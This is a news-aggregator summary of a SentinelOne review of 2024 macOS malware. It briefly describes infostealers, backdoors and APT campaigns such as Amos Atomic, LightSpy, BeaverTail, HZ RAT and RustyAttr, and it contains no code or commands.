A naukri.com initiative
Sentinelone
3d
264
Image Credit: Sentinelone
2024 macOS Malware Review | Infostealers, Backdoors, and APT Campaigns Targeting the Enterprise
- 2024 saw a sharp rise in macOS malware campaigns targeting enterprise users, with infostealers, backdoors, and APTs being the key threats.
- The Amos Atomic family of stealers includes stealer varieties that grab login credentials, making it possible to uncover Keychain-based credentials.
- The Backdoor Activator trojan is delivered via cracked versions of commercial applications and installs a Python runtime to execute arbitrary commands.
- The LightSpy malware is a modular surveillance tool that captures audio-visual recordings of the device, collects user history, and records keystrokes and clipboard data.
- BeaverTail (attributed to North Korean state-sponsored groups) targets job seekers, targets crypto wallets, and installs a secondary payload for keylogging and remote control software.
- ToDoSwift and Hidden Risk are two similar APT campaigns identified in 2024 that target the crypto sector.
- The HZ RAT backdoor targets DingTalk and WeChat installations to steal user info and exfiltrate data using shell commands.
- CloudChat delivers malware via a disk image and attempts to exfiltrate data and monitor clipboard data.
- NotLockBit ransomware has data exfiltration capabilities and attempts to lock files, although samples discovered have not been associated with any distinct delivery method and have no known victims.
- RustyAttr is a macOS malware that leverages the Tauri development framework to hide malicious code in extended attributes.
Read Full Article
15 Likes
For uninterrupted reading, download the app